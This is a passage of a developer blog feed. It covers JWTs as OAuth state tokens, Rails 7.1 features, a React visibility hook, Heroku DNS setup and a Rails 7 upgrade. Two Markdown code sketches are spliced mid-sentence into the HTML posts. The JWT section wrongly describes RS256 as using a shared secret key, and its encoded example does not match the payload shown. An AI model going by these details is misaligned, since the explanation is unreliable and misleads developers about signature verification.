unauthorized third party:</p><ol><li><p>The third party requests authorization from GitHub. The third party would pass your ID as <code>client_id</code>. This would lead GitHub to believe the request is from your application. The third party may or may not pass a <code>state</code> parameter.</p></li><li><p>GitHub then asks the user to grant the authorization.
If the third party uses one of their own accounts, they could grant the authorization. The third party could also convince a user to grant permission using social engineering. For example, they could perform a phishing attack using an email designed to trick the user into believing that the email was from your application.</p></li><li><p>GitHub sends a request to the application through the URI passed as <code>redirect_uri</code> in the first step. This request would contain the <code>code</code> parameter, and the <code>state</code> parameter if it was passed in step 1.</p></li><li><p>It would be clear that the process was not initiated by your application if the <code>state</code> parameter is missing. Even if there was a <code>state</code> parameter, it would not be found in memory. This is because the state parameter was generated by a third party and not by your application. Only those state parameters generated by your application will be found in your memory.</p></li></ol><h2>JSON Web Tokens</h2><p>A JSON Web Token (JWT) is a structured format that contains header, payload, and signature components. Let's take a look at the significance of these components:</p><ol><li><p><strong>Header</strong> - The header is a JSON string that typically contains the signing algorithm used, such as HMAC-SHA256 or RSA.</p></li><li><p><strong>Payload</strong> - The payload is a JSON string that contains claims and additional data. Claims can be used to enforce security constraints and validate the authenticity of the token and its contents. For example, a claim can specify the token expiration time. The expiration time, most commonly represented by <code>exp</code>, is the date and time after which the token will no longer be considered valid.</p></li><li><p><strong>Signature</strong> - The signature is used to verify that the sender of the JWT is who it says it is and to ensure that the token has not been tampered with along the way.
Much like a person's handwritten signature, a JWT signature is hard to forge. (In fact, digital signatures are significantly harder to forge than handwritten ones.)</p></li></ol><h3>Generating a JWT</h3><p>The following steps outline the process of generating a JWT:</p><ol><li><p>The header and the payload of the JWT are first encoded using Base64 encoding. So now we have two strings - the encoded header and the encoded payload.</p></li><li><p>The encoded header and the encoded payload are concatenated into a single string, with dots (.) separating each part. The concatenated string is signed using the signing algorithm specified in the header. The signing algorithm uses a secret key that is known only to the issuer (your application), which ensures that only the issuer can generate a valid signature. The result of the signing process is a signature, which is also a string.</p></li><li><p>The encoded header, the encoded payload, and the signature are concatenated into a single string, with dots (.) separating each part. The resulting string is the JWT, which can be transferred securely between parties.</p></li></ol><p>For example, let's say we have the following header:</p><pre><code class="language-json">{ &quot;alg&quot;: &quot;RS256&quot; }</code></pre><p>The value of <code>alg</code> contains the algorithm used for signing the JWT. Also, let's say we have the following payload:</p><pre><code class="language-json">{ &quot;username&quot;: &quot;sam@example.com&quot;, &quot;exp&quot;: 1676263763 }</code></pre><p>The <code>username</code> is data that needs to be transferred. <code>exp</code> contains the expiration time claim of the JWT.</p><p>When both these components are encoded, we get:</p><ul><li>Header - &quot;eyJhbGciOiJSUzI1NiJ9&quot;</li><li>Payload - &quot;eyJ1c2VyIjoic2FtQGV4YW1wbGUuY29tIiwiZXhwIjoxNjc2MjYzNzYzfQ&quot;</li></ul><p>When these are signed using the RS256 algorithm and a secret key, a signature is produced.
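The generation and verification steps described in this post can be sketched in plain Ruby using only the standard library. This is an illustrative sketch, not the article's code: it uses HS256 (HMAC-SHA256) rather than the RS256 of the article's example, and the method names `generate_jwt` and `valid_jwt?` are made up for this demo. In real applications, prefer a maintained library such as the `jwt` gem.

```ruby
require "base64"
require "json"
require "openssl"

def base64url(data)
  Base64.urlsafe_encode64(data, padding: false)
end

def generate_jwt(payload, secret)
  header = { alg: "HS256", typ: "JWT" }
  # Step 1 and 2: Base64-encode the header and the payload, join them with a dot
  signing_input = "#{base64url(header.to_json)}.#{base64url(payload.to_json)}"
  # Step 2: sign the concatenated string with the secret key
  signature = base64url(OpenSSL::HMAC.digest("SHA256", secret, signing_input))
  # Step 3: header.payload.signature
  "#{signing_input}.#{signature}"
end

def valid_jwt?(token, secret)
  encoded_header, encoded_payload, signature = token.split(".")
  expected = base64url(
    OpenSSL::HMAC.digest("SHA256", secret, "#{encoded_header}.#{encoded_payload}")
  )
  # Real code should use a constant-time comparison here
  expected == signature
end

token = generate_jwt({ username: "sam@example.com", exp: 1676263763 }, "my-secret")
puts token.split(".").length           # => 3
puts valid_jwt?(token, "my-secret")    # => true
puts valid_jwt?(token, "wrong-secret") # => false
```

Note that this sketch checks only the signature; production code should also validate claims such as `exp`, as described later in the post.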
The following signature was generated using the RS256 algorithm and a secret key (which will remain secret):</p><pre><code class="language-text">NlAT6awp68dCEcFXbDeeLTzZekqUmB3f6kr3jkGSFmrKa5zvLmFGeraWba_fUuQLVhRtcXUPZbRR1DKnKH0HVf1rRDvOqezwbhe-hR1wlz6vZkHuPjtYSCLx_aybGm7dy2ijfTQwYd14cD9ZiMI5vf6XcDDfE7mkhu0ogCOnqR1v3KOEWJkMkvGBHfHKuf9FKYbWltHtUE6bAEO1orq0JayD8UNUKxdGkElXA7mkuIEexmBuieG9PJ2ow_uo05QCsqDvxlzOCMMIe7WdT7gmz4myiZ7lVuUcL1V2-Y1PJqWDyqDZbKNxd4X_CwW0RLOF1pw9S2URgybqHZFG0murNw</code></pre><p>So the final JWT would be:</p><p><img src="/blog_images/2023/how-to-use-jwt-to-secure-your-github-oauth-callback-endpoint/jwt_decoded.png" alt="Screenshot of decoded JWT"></p><p>The image above was captured from the decoding tool in <a href="https://jwt.io/">jwt.io</a>.</p><p>A JWT is basically a Base64 encoded string with a signature attached to it. Having that signature component makes JWT a secure format for transferring data. It is possible to simply encode data with Base64 and transfer that string. From the example above, transferring the encoded payload &quot;eyJ1c2VyIjoic2FtQGV4YW1wbGUuY29tIiwiZXhwIjoxNjc2MjYzNzYzfQ&quot; can also get the data to the other party. However, the party that receives the data has no way of ensuring that the data was sent by a trusted source and that the data was not tampered with along the way.</p><h3>Verifying JWT tokens</h3><p>Anyone who has the secret key used to sign a JWT can verify the integrity of the JWT. The steps involved in verifying the signature of a JSON Web Token (JWT) are:</p><ol><li><p>Split the JWT into the encoded header, the encoded payload and the signature, using the dot (.)
used to separate the three components.</p></li><li><p>Decode the encoded header and the encoded payload using Base64 to get the header and payload JSON strings.</p></li><li><p>The application recreates the signature by signing the encoded header and the encoded payload using the signing algorithm in the header and the secret key. If the signature created in this step is the same as the signature in the JWT, the JWT is valid.</p></li><li><p>The application validates the claims in the payload if there are any.</p></li></ol><p>If the signature is valid, it can be verified that the JWT was generated by your application and has not been tampered with. If the JWT header or payload was tampered with, the signature produced while verifying would be different from the one in the JWT.</p><h2>Using JWT for the state parameter</h2><p>We can generate a JWT token and pass that as the state parameter in the GitHub OAuth authorization process. Here's how the process will be different when using JWT:</p><ol><li><p>The application requests authorization from GitHub. This time the <code>state</code> parameter will be a JWT signed using a secure algorithm and a secret key. The JWT need not be stored in memory.</p></li><li><p>GitHub gets the approval of the user.</p></li><li><p>GitHub sends a request to the application through the URI passed as <code>redirect_uri</code> in the first step. This request will contain the <code>code</code> and the <code>state</code> parameters. Here, the state parameter would be a JWT.</p></li><li><p>Validate the JWT from the <code>state</code> parameter. If the JWT is invalid, drop the authorization process immediately.</p></li></ol><h2>Advantages of using JWT for the state parameter</h2><ol><li><p><strong>No storage requirement</strong> - When using a random string for the state parameter, that string has to be stored, so that it can be used later for verification.
However, JWTs can be verified without storing them once they are generated.</p></li><li><p><strong>Ability to send additional data</strong> - The payload component of JWT can be used to send additional data such as user data, permissions data, etc.</p></li><li><p><strong>Security</strong> - Using JWT can ensure that the OAuth process was initiated by your application or a trusted source. In addition, JWT also ensures the integrity of the data. This means that we can ensure that the payload in the JWT has not been tampered with.</p></li><li><p><strong>Flexibility</strong> - The claims in the payload component of JWT can be used to further enhance the security of the JWT by implementing custom security checks based on those claims.</p></li><li><p><strong>Standardization</strong> - JWT is a widely used format for transferring data. Using JWT would be beneficial when there are different applications and services involved in the OAuth process.</p></li></ol><h2>References</h2><ol><li><p>OAuth 2.0 - <a href="https://www.digitalocean.com/community/tutorials/an-introduction-to-oauth-2">https://www.digitalocean.com/community/tutorials/an-introduction-to-oauth-2</a></p></li><li><p>GitHub OAuth Authorization process - <a href="https://docs.github.com/en/developers/apps/building-oauth-apps/authorizing-oauth-apps">https://docs.github.com/en/developers/apps/building-oauth-apps/authorizing-oauth-apps</a></p></li><li><p>Phishing Attack - <a href="https://www.imperva.com/learn/application-security/phishing-attack-scam/">https://www.imperva.com/learn/application-security/phishing-attack-scam/</a></p></li></ol>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.1 adds ActiveJob.perform_all_later]]></title>
       <author><name>Vishnu M</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-1-adds-activejob-perform-all-later"/>
      <updated>2023-02-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-1-adds-activejob-perform-all-later</id>
      <content type="html"><![CDATA[<p>Rails 7.1 adds <code>ActiveJob.perform_all_later</code> to enqueue multiple jobs at once. This method accepts an array of job instances. Just like Active Record bulk methods, <code>perform_all_later</code> doesn't run any callbacks.</p><p>For example, if we want to send a welcome email to multiple users, we can do this:</p><pre><code class="language-ruby">welcome_email_jobs = users.map do |user|
  WelcomeEmailJob.new(user)
end

ActiveJob.perform_all_later(welcome_email_jobs)</code></pre><p>The benefit of doing it this way, rather than looping through the user records and using <code>perform_later</code>, is that <code>perform_all_later</code> cuts down on the number of round-trips to the queue datastore. That means reducing Redis round-trip latency if the queuing backend is Sidekiq. Whereas if we're using a queuing backend like <a href="https://github.com/bensheldon/good_job">GoodJob</a>, which is backed by Postgres, <code>perform_all_later</code> will enqueue all the jobs using a single INSERT statement, which is more performant.</p><p>Please note that if the queuing backend doesn't support bulk enqueuing, <code>perform_all_later</code> will fall back to enqueuing each job individually.</p><p>Active Job is designed to abstract away the differences between different job processing libraries and to provide a unified interface.
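The round-trip saving described above can be illustrated with a toy model. `ToyQueue` and its methods are invented for this sketch; they are not the real API of Sidekiq or any Active Job adapter. The point is only that a bulk push touches the datastore once, no matter how many jobs are in the batch.

```ruby
# A toy queue backend that counts datastore round-trips.
class ToyQueue
  attr_reader :round_trips, :jobs

  def initialize
    @round_trips = 0
    @jobs = []
  end

  # Enqueuing jobs one at a time costs one round-trip per job.
  def push(job)
    @round_trips += 1
    @jobs << job
  end

  # Bulk enqueuing pushes the whole batch in a single round-trip.
  def push_bulk(batch)
    @round_trips += 1
    @jobs.concat(batch)
  end
end

one_by_one = ToyQueue.new
100.times { |i| one_by_one.push("job-#{i}") }
puts one_by_one.round_trips # => 100

bulk = ToyQueue.new
bulk.push_bulk((0...100).map { |i| "job-#{i}" })
puts bulk.round_trips # => 1
```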
It is made possible using <a href="https://api.rubyonrails.org/classes/ActiveJob/QueueAdapters.html">adapters</a>.</p><p>The popular queuing backend Sidekiq already has a <a href="https://github.com/sidekiq/sidekiq/wiki/Bulk-Queueing">push_bulk</a> method. Hence, the author of this pull request has made <a href="https://github.com/rails/rails/pull/46603/files#diff-e1ee600ca5fd100da20810ef5acbab89546064fc323c7b1e6bdb6ed5e681a9d3">changes</a> to the Sidekiq adapter so that <code>perform_all_later</code> uses the <code>push_bulk</code> method from Sidekiq.</p><p>Recently, GoodJob has also added support for bulk enqueuing in this <a href="https://github.com/bensheldon/good_job/pull/790">pull request</a>.</p><p>Practically, <code>ActiveJob.perform_all_later</code> is only useful if we want to push thousands of jobs at once. For a smaller number of jobs, the performance benefits will not be significant.</p><p>Please check out this <a href="https://github.com/rails/rails/pull/46603">pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.1 adds adapter option to disallow foreign keys]]></title>
       <author><name>Aditya Bhutani</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-1-adds-adapter-option-to-disallow-foregin-keys"/>
      <updated>2023-02-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-1-adds-adapter-option-to-disallow-foregin-keys</id>
      <content type="html"><![CDATA[<p>There are times when an application can choose <strong>not</strong> to use foreign keys. Data transfer between services is a tricky thing. When we are importing the data, we need to import the data in the right order if &quot;foreign keys&quot; are enabled. In such cases one might want to not enforce &quot;foreign keys&quot;, load the data, and then add the &quot;foreign keys&quot; constraint back.</p><p>Situations like this can be handled using migrations. Using migrations, we can disable &quot;foreign keys&quot;. However, this would mean writing migrations for all the tables and removing all &quot;foreign keys&quot;. This could be cumbersome.</p><pre><code class="language-ruby">def change
  create_table :authors do |t|
    t.string :name

    t.timestamps
  end

  create_table :books do |t|
    t.belongs_to :author, foreign_key: false
    t.datetime :published_at

    t.timestamps
  end
end</code></pre><p>Rails 7.1 adds an option to database.yml that enables skipping foreign key constraints usage even if the underlying database supports them, and solves the above issue of writing migrations to disable foreign keys for all the tables.</p><pre><code class="language-yaml">development:
  &lt;&lt;: *default
  database: db/development.sqlite3
  foreign_keys: false</code></pre><p>Please check out this <a href="https://github.com/rails/rails/pull/45301">pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.1 allows using aliased attributes with insert_all/upsert_all]]></title>
       <author><name>Aditya Bhutani</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-1-allows-using-aliased-attributes-with-insert_all-upsert_all"/>
      <updated>2023-01-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-1-allows-using-aliased-attributes-with-insert_all-upsert_all</id>
      <content type="html"><![CDATA[<p>Before Rails 6 we had update_all and delete_all. Rails 6 added insert_all and upsert_all.</p><p><a href="https://api.rubyonrails.org/classes/ActiveRecord/Persistence/ClassMethods.html#method-i-insert_all">insert_all</a>: This method can insert multiple records with a single SQL INSERT statement.</p><p><a href="https://api.rubyonrails.org/classes/ActiveRecord/Persistence/ClassMethods.html#method-i-upsert_all">upsert_all</a>: This method updates the records if they exist or inserts them into the database with a single SQL INSERT statement.</p><p><a href="https://api.rubyonrails.org/classes/ActiveModel/AttributeMethods/ClassMethods.html#method-i-alias_attribute">alias_attribute</a>: Allows you to make aliases for attributes, which include a getter, a setter, and a predicate.</p><p>Rails 7.1 allows the use of aliased attributes with <code>insert_all</code> and <code>upsert_all</code>. Previously, whenever we added an alias for an attribute, we couldn't use it for insert_all and upsert_all.</p><pre><code class="language-ruby">class User &lt; ApplicationRecord
  # database column is `name`. `full_name` is the alias.
  alias_attribute :full_name, :name
end</code></pre><h3>Before Rails 7.1</h3><pre><code class="language-ruby"># rails console
&gt; User.insert_all [{ full_name: &quot;John Doe&quot; }]
=&gt; # unknown attribute 'full_name' for User. (ActiveModel::UnknownAttributeError)</code></pre><h3>After Rails 7.1</h3><pre><code class="language-ruby"># rails console
&gt; User.insert_all [{ full_name: &quot;Jane Doe&quot; }]
=&gt; # User Insert
&gt; User.last
=&gt; #&lt;User id: 6, name: &quot;Jane Doe&quot;, created_at: Mon, 21 Nov 2022 18:07:11.349000000 UTC +00:00, updated_at: Mon, 21 Nov 2022 18:07:11.349000000 UTC +00:00&gt;</code></pre><p>Now we can use the alias attribute with <code>insert_all</code> and <code>upsert_all</code>.</p><p>Please check out this <a href="https://github.com/rails/rails/pull/45036">pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How to detect changes in component visibility when scrolling?]]></title>
       <author><name>Amaljith K</name></author>
      <link href="https://www.bigbinary.com/blog/how-to-detect-changes-in-component-visibility-when-scrolling"/>
      <updated>2022-09-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-to-detect-changes-in-component-visibility-when-scrolling</id>
      <content type="html"><![CDATA[<p>When there is a need to display a large set of data, most of the web applications split the whole set into several smaller chunks and then serve them on demand. This technique is called pagination.</p><p>Earlier, pagination looked like this:</p><p><img src="https://user-images.githubusercontent.com/85148587/191435753-53aa1d13-3d55-42f2-b95d-922b6e0e3b7f.png" alt="image"></p><p>Here, loading the next set of data required the user to click on the next page button.</p><p>These days, we use the infinite scroll technique, which automatically loads the next set of data when the user scrolls to the bottom of the list. This is more user-friendly:</p><p><img src="https://user-images.githubusercontent.com/85148587/191432751-89eef3dc-5c5e-4939-8150-38dc98cee262.gif" alt="image"></p><p>Several JS libraries are available to facilitate infinite scroll. But to quench our curiosity about how things work under the hood, it is best to try to implement it from scratch.</p><p>To implement infinite scroll, we need to know when the user has scrolled to the bottom of the list to load the next page's data. To know if the user has reached the bottom, we can watch the last element of the list. That is, when the list is scrolled and the last element becomes visible, we know that we are at the bottom.</p><p>Detecting the visibility of elements during scroll was a hard problem until recently. We had to hook onto <code>onscroll</code> events of the element and check the boundaries of the elements using the <a href="https://developer.mozilla.org/en-US/docs/Web/API/Element/getBoundingClientRect">getBoundingClientRect</a> function.</p><p>Since the <code>onscroll</code> event gets fired around 40-50 times per second, performing the operations inside it will become expensive. Moreover, the <code>onscroll</code> function gets executed from the main UI thread.
All these together make our web application sluggish.</p><p>But now, we have a much more performant alternative for this problem. <a href="https://developer.mozilla.org/en-US/docs/Web/API/Intersection_Observer_API#browser_compatibility">All popular web browsers</a> support a new API named <a href="https://developer.mozilla.org/en-US/docs/Web/API/Intersection_Observer_API">IntersectionObserver</a> from 2019 onwards.</p><p>The advantages of the <code>IntersectionObserver</code> API are:</p><ul><li>It doesn't grab the resources from the UI thread. It accepts a callback function that will be fired <strong>asynchronously</strong>.</li><li>The supplied callback is triggered only when a change in visibility is detected. We can save 40-50 repetitions per second during the scroll.</li><li>We don't need to worry about maintaining boilerplate code for detecting the boundaries &amp; calculating the visibility. We get all useful data as a parameter to the callback function.</li></ul><p>The introduction of <code>IntersectionObserver</code> simplified a whole set of requirements like:</p><ul><li>Infinite loading.</li><li>Improving page load time by not fetching resources (like images) that aren't visible until the user scrolls to them. This is called lazy loading.</li><li>Tracking whether the user has scrolled to and viewed an ad posted on the webpage.</li><li>UX improvements like dimming animation for the components that aren't fully visible.</li></ul><p>In this blog, we are going to discuss how we can use <code>IntersectionObserver</code> in a React application as hooks.</p><h2>Creating a hook for detecting visibility changes</h2><p>We will create a custom hook that will update whenever the specified component scrolls into view and scrolls out of view. Let us name the hook <code>useIsElementVisible</code>. Obviously, it will accept a reference to the component whose visibility needs to be monitored as its argument.</p><p>It will have a state to store the visibility status of the specified element.
It will have a useEffect hook from which we will bind the <code>IntersectionObserver</code> to the specified component.</p><p>Here is the basic implementation:</p><pre><code class="language-js">import { useEffect, useState } from &quot;react&quot;;

const useIsElementVisible = target =&gt; {
  const [isVisible, setIsVisible] = useState(false); // store visibility status

  useEffect(() =&gt; {
    // bind IntersectionObserver to the target element
    const observer = new IntersectionObserver(onVisibilityChange);
    observer.observe(target);
  }, [target]);

  // handle visibility changes
  const onVisibilityChange = entries =&gt; setIsVisible(entries[0].isIntersecting);

  return isVisible;
};

export default useIsElementVisible;</code></pre><p>We can use <code>useIsElementVisible</code> like this:</p><pre><code class="language-jsx">const ListItem = () =&gt; {
  const elementRef = useRef(null); // to hold a reference to the component we need to track
  const isElementVisible = useIsElementVisible(elementRef.current);

  return (
    &lt;div ref={elementRef} id=&quot;list-item&quot;&gt;
      {/* your component jsx */}
    &lt;/div&gt;
  );
};</code></pre><p>The component <code>ListItem</code> will get updated whenever the user scrolls to see the div <code>&quot;list-item&quot;</code>. We can use the value of <code>isElementVisible</code> to load the contents of the next page from a <code>useEffect</code> hook:</p><pre><code class="language-js">useEffect(() =&gt; {
  if (isElementVisible &amp;&amp; nextPageNotLoadedYet()) {
    loadNextPage();
  }
}, [isElementVisible]);</code></pre><p><strong>This works in theory.</strong> But if you try it, you will notice that this doesn't work as expected. We missed an edge case.</p><h2>The real-life edge case</h2><p>We use a <code>useRef</code> hook for referencing the <code>div</code>. During the initial render, <code>elementRef</code> was just initialized with <code>null</code> as its value.
So, <code>elementRef.current</code> will be null and, as a result, the call <code>useIsElementVisible(elementRef.current)</code> won't attach our observer to the element for the first time.</p><p>Unfortunately, the useRef hook won't trigger a re-render when a value is set to it after the DOM is prepared. Also, there are no state updates or anything that requests a re-render inside our example component. In short, our component will render only once.</p><p>With these in place, <code>useIsElementVisible</code> will never get a reference to the <code>&quot;list-item&quot;</code> div in our previous example.</p><p>But there is a workaround for our problem. We can force-render the component twice during the first mount.</p><p>To make it possible, we will add a dummy state. When our hook is called for the first time (when <code>ListItem</code> mounts), we will update our state once, thereby requesting React to repeat the component render steps again. During the second render, we will already have our DOM ready and we will have the target element attached to <code>elementRef</code>.</p><h2>Force re-rendering the component</h2><p>To keep our code clean and modular, let us create a dedicated custom hook for managing force re-renders:</p><pre><code class="language-js">import { useState } from &quot;react&quot;;

const useForceRerender = () =&gt; {
  const [, setValue] = useState(0); // we don't need the value of this state.

  return () =&gt; setValue(value =&gt; value + 1);
};

export default useForceRerender;</code></pre><p>Now, we can use it in our <code>useIsElementVisible</code> hook this way:</p><pre><code class="language-js">const useIsElementVisible = target =&gt; {
  const [isVisible, setIsVisible] = useState(false);
  const forceRerender = useForceRerender();

  useEffect(() =&gt; {
    forceRerender();
  }, []);

  // previous code to register observer

  return isVisible;
};</code></pre><p>With this change, our hook is now self-sufficient and fully functional.
In our <code>ListItem</code> component, <code>isElementVisible</code> will update to <code>false</code> and trigger a component re-render whenever our <code>&quot;list-item&quot;</code> div goes outside the visible zone during scroll. It will also update to <code>true</code> when it is scrolled into visibility again.</p><h2>Possible improvements to the useIsElementVisible hook</h2><p>The <code>useIsElementVisible</code> hook shown in the previous sections serves only the basic use case. It is not optimal for production use.</p><p>These are the areas where our hook can be improved:</p><ul><li>We can let in <a href="https://developer.mozilla.org/en-US/docs/Web/API/Intersection_Observer_API#intersection_observer_options">configurations for IntersectionObserver</a> to customize its behavior.</li><li>We can prevent initializing the observer when the <code>target</code> is not ready yet (when it is <code>null</code>).</li><li>We can add a cleanup function to stop observing the element when our component gets unmounted.</li></ul><p>Here is what the optimum code for the hook should look like:</p><pre><code class="language-js">import { useEffect, useState } from &quot;react&quot;;

export const useForceRerender = () =&gt; {
  const [, setValue] = useState(0); // we don't need the value of this state.

  return () =&gt; setValue(value =&gt; value + 1);
};

export const useIsElementVisible = (target, options = undefined) =&gt; {
  const [isVisible, setIsVisible] = useState(false);
  const forceUpdate = useForceRerender();

  useEffect(() =&gt; {
    forceUpdate(); // to ensure that ref.current is attached to the DOM element
  }, []);

  useEffect(() =&gt; {
    if (!target) return;

    const observer = new IntersectionObserver(handleVisibilityChange, options);
    observer.observe(target);

    return () =&gt; observer.unobserve(target);
  }, [target, options]);

  const handleVisibilityChange = ([entry]) =&gt;
    setIsVisible(entry.isIntersecting);

  return isVisible;
};</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Setting up Heroku DNS using Cloudflare]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/setting-up-heroku-dns-using-clouflare"/>
      <updated>2022-09-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/setting-up-heroku-dns-using-clouflare</id>
      <content type="html"><![CDATA[<p>Lots of folks know <a href="https://www.cloudflare.com/">Cloudflare</a> for the DDoS protection, rate limiting, and other services it provides. Here at BigBinary, we also use Cloudflare for DNS management.</p><p>DNS management is a free service by Cloudflare. However, at first glance, it might not appear that it's a free service. Once we add a site, we see a screen like this. Here, we need to remember to scroll down to see the free option.</p><p><img src="/blog_images/2022/setting-up-heroku-dns-using-clouflare/pricing.png" alt="cloudflare pricing page"></p><p>Now let's see how we can map the DNS settings from Heroku to Cloudflare. We will look at a standard domain name first and then at a wildcard domain name.</p><h3>Standard domain name</h3><p>We are hosting <a href="https://www.gitemit.com/">GitEmit</a> using Heroku. We are letting Heroku manage the SSL for this domain.</p><p>After setting up domains in Heroku, here is what we see.</p><p><img src="/blog_images/2022/setting-up-heroku-dns-using-clouflare/heroku-dns-gitemit.png" alt="Heroku DNS gitemit"></p><p>In Cloudflare, we can set it up using two CNAMEs. It looks like this.</p><p><img src="/blog_images/2022/setting-up-heroku-dns-using-clouflare/cloudflare-heroku-gitemit.png" alt="Heroku DNS"></p><h3>Wildcard domain name</h3><p>We are hosting the <a href="https://www.neeto.com/neetochat/">NeetoChat</a> application using Heroku.</p><p>Since it's a wildcard domain, we had to <a href="https://www.bigbinary.com/blog/wild-card-ssl-on-heroku">generate the certificates</a> ourselves.</p><p>After setting up domains in Heroku, here is what we see.</p><p><img src="/blog_images/2022/setting-up-heroku-dns-using-clouflare/heroku-dns-neetochat.png" alt="Heroku DNS NeetoChat"></p><p>In Cloudflare, we can set it up using three CNAMEs.
It looks like this.</p><p><img src="/blog_images/2022/setting-up-heroku-dns-using-clouflare/cloudflare-heroku-neetochat.png" alt="Heroku DNS"></p>]]></content>
    </entry><entry>
       <title><![CDATA[How we upgraded from Rails 6 to Rails 7]]></title>
       <author><name>Abhishek T</name></author>
      <link href="https://www.bigbinary.com/blog/how-we-upgraded-from-rails-6-to-rails-7"/>
      <updated>2022-09-20T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-we-upgraded-from-rails-6-to-rails-7</id>
      <content type="html"><![CDATA[<p>Recently, we upgraded all <a href="https://www.neeto.com/">neeto</a> products to Rails 7 using the <a href="https://guides.rubyonrails.org/upgrading_ruby_on_rails.html">Rails upgrade guide</a>.</p><p>Here are the issues we faced during the upgrade.</p><h3>Migrating to Active Record Encryption</h3><p>This was the biggest challenge we faced during the upgrade. For encrypting columns, we had used the <a href="https://github.com/attr-encrypted/attr_encrypted">attr_encrypted</a> gem. However, Rails 7 came with <a href="https://guides.rubyonrails.org/active_record_encryption.html">Active Record Encryption</a>. So we needed to decrypt the records in the production database and encrypt them using Active Record Encryption. We found that the &quot;attr_encrypted&quot; gem was incompatible with Rails 7. So the only option was to remove the &quot;attr_encrypted&quot; gem and decrypt the records using a script. We used the following method to decrypt the records.</p><pre><code class="language-rb">def decrypted_attribute(attribute_name, record)
  value = record.send(attribute_name)
  return if value.blank?

  value = Base64.decode64(value)
  cipher = OpenSSL::Cipher.new(&quot;aes-256-gcm&quot;)
  cipher.decrypt
  cipher.key = Rails.application.secrets.attr_encrypted[:encryption_key]
  cipher.iv = Base64.decode64(record.send(:&quot;#{attribute_name}_iv&quot;))
  cipher.auth_tag = value[-16..]
  cipher.auth_data = &quot;&quot;
  cipher.update(value[0..-17]) + cipher.final
end</code></pre><h3>Broken images in Active Storage</h3><p>After the upgrade, we started getting broken images in some places. This happened for Active Storage links embedded in Rich Text. After some debugging, we found that we were getting incorrect Active Storage links because of a change in the key generation algorithm.
The following configuration was loading images using the old algorithm.</p><pre><code class="language-rb">config.active_support.key_generator_hash_digest_class = OpenSSL::Digest::SHA1</code></pre><p>Since the new algorithm provides more security, we decided to migrate the links instead of using the old algorithm. We used the following code to migrate the old links to new valid links.</p><pre><code class="language-rb"># Usage:
# text_with_new_links = ActiveStorageKeyConverter.new(text_with_old_links).process
# If there are no links to replace, the original text is returned as is.
class ActiveStorageKeyConverter
  def initialize(text)
    @text = text
  end

  def process
    replace(@text)
  end

  private

    def convert_key(id)
      verifier_name = &quot;ActiveStorage&quot;
      key_generator = ActiveSupport::KeyGenerator.new(Rails.application.secrets.secret_key_base, iterations: 1000, hash_digest_class: OpenSSL::Digest::SHA1)
      key_generator = ActiveSupport::CachingKeyGenerator.new(key_generator)
      secret = key_generator.generate_key(verifier_name.to_s)
      verifier = ActiveSupport::MessageVerifier.new(secret)
      ActiveStorage::Blob.find_by_id(verifier.verify(id, purpose: :blob_id)).try(:signed_id) rescue nil
    end

    def replace(text)
      keys = text.scan(URI.regexp).flatten.select { |x| x.to_s.include?(&quot;rails/active_storage&quot;) }.map { |x| x.split(&quot;/&quot;)[-2] }
      keys.each do |key|
        new_key = convert_key(key)
        text = text.gsub(key, new_key) if new_key
      end
      text
    end
end</code></pre><p>The following one-time rake task was used to update the Active Storage links in the <code>content</code> column of the <code>Task</code> model:</p><pre><code class="language-rb">desc &quot;Update active storage links embedded in rich text to support rails 7&quot;
task migrate_old_activestorage_links: :environment do
  table_column_map = {
    &quot;Task&quot; =&gt; &quot;content&quot;,
  }
  match_term = &quot;%rails/active_storage%&quot;

  table_column_map.each do |model_name, column_name|
    model_name.to_s.constantize.where(&quot;#{column_name} ILIKE ?&quot;, match_term).find_each do |row|
      row.update_column(column_name, ActiveStorageKeyConverter.new(row[column_name]).process)
    end
  end
end</code></pre><h3>Test failures with the mailer jobs</h3><p>After upgrading to Rails 7, tests related to mailers started to fail. This was because the mailer jobs were being enqueued in the <code>default</code> queue instead of <code>mailers</code>.
We fixed this by adding the following configuration.</p><pre><code class="language-rb">config.action_mailer.deliver_later_queue_name = :mailers</code></pre><h3>Autoloading during initialization failed</h3><p>After the upgrade, when we started the Rails server, we got the following error.</p><pre><code>$ rails s
=&gt; Booting Puma
=&gt; Rails 7.0.3.1 application starting in development
=&gt; Run `bin/rails server --help` for more startup options
Exiting
/Users/BB/Neeto/neeto_commons/lib/neeto_commons/initializers/session_store.rb:13:in `session_store': uninitialized constant #&lt;Class:NeetoCommons::Initializers&gt;::ServerSideSession (NameError)

    ActionDispatch::Session::ActiveRecordStore.session_class = ServerSideSession
                                                                ^^^^^^^^^^^^^^^^^
    from /Users/BB/Neeto/neeto-planner-web/config/initializers/common.rb:10:in `&lt;main&gt;'</code></pre><p>That error was coming from our internal <code>neeto-commons</code> initializer called <code>session_store.rb</code>.
The code looked like this.</p><pre><code class="language-rb"># session_store.rb
module NeetoCommons
  module Initializers
    class &lt;&lt; self
      def session_store
        Rails.application.config.session_store :active_record_store,
          key: Rails.application.secrets.session_cookie_name, expire_after: 10.years.to_i

        ActiveRecord::SessionStore::Session.table_name = &quot;server_side_sessions&quot;
        ActiveRecord::SessionStore::Session.primary_key = &quot;session_id&quot;
        ActiveRecord::SessionStore::Session.serializer = :json
        ActionDispatch::Session::ActiveRecordStore.session_class = ServerSideSession
      end
    end
  end
end</code></pre><p>In order to fix the issue, we had to put the last statement in a block as shown below.</p><pre><code class="language-rb">Rails.application.config.after_initialize do
  ActionDispatch::Session::ActiveRecordStore.session_class = ServerSideSession
